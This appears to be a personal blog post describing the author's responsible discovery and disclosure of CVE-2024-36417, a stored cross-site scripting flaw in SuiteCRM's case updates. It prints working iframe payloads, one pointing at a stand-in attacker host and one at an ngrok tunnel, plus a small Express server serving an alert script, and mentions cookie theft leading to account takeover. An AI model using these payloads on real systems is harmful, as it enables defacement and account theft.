Here is a brief introduction about me before starting: I'm a 19 y/o cyber security enthusiast/learner who likes to hunt down bugs as a passion. This is a very quick article on how I discovered my first CVE. So let's get into it…
CVE-2024-36417
Mitre.org : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36417
NVD : https://nvd.nist.gov/vuln/detail/CVE-2024-36417
POC : https://github.com/salesagility/SuiteCRM/security/advisories/GHSA-3www-6rqc-rm7j
POC (Video) : https://drive.google.com/file/d/1LhQpeMNo-xBMy7ciRt-DvG2DbP7UUW-p/view
The Discovery 🔎
I was hunting for bugs on platforms like HackerOne and Bugcrowd and was onto nothing for months. Then I thought, "Why don't I hunt some open-source systems?" I quickly hopped onto GitHub and searched for well-maintained CRM repositories. Then I found SuiteCRM. It had a decent amount of stars and was maintained frequently. I cloned it onto my system and started the server. I started clicking on all buttons, hyperlinks and navigation to map the webapp structure…
The Bug 🪲
After clicking through the system for about 1 hour I found a sweet spot! A feature where users can post "Case updates" about a specific case. If I post a "Case update" as user1, user2 can view it.
I started posting classic XSS payloads, but they were getting filtered. I tried many tags, but many of them didn't work. Finally, one tag worked! The <iframe> tag worked without getting filtered.
I tried posting:
<iframe src="https://test.attacker.com">
And it worked. Now I logged out from user1 and logged in as user2.
I went to the case page, and there I could see the iframe being rendered successfully.
Now, to demonstrate impact, I created a web server on my local machine with the following code:
const express = require('express');
const app = express();
const port = 2222;

// Every GET to / returns a page whose only content is a script tag,
// so the alert fires when this page is loaded inside the iframe.
app.get('/', (req, res) => {
return res.send("<script>alert('You are hacked')</script>");
});

app.listen(port, () => {
console.log(`Server started on port ${port}`);
});
Then I port-forwarded the web server using Ngrok.
Then I crafted an iframe as follows:
<iframe src="https://test.ngrok-free.app">
and posted it as a case update as user1. I logged out from user1 and logged in as user2 (the victim).
When I visited the case updates, BOOM! The page said "You are hacked", which means the XSS successfully worked through the iframe.
Now, as an attacker, I could do a permanent page defacement using the iframe and could also craft a cookie-stealer webpage, which could lead to a potential account takeover attack.
Conclusion ✨
This was a quick and small article on my CVE discovery. Hope you liked it. Please clap for this story if you liked it. Thank you 💖
Timeline 🕔
Reported on : 15/01/2024
First response : 06/02/2024
CVE published on : 10/06/2024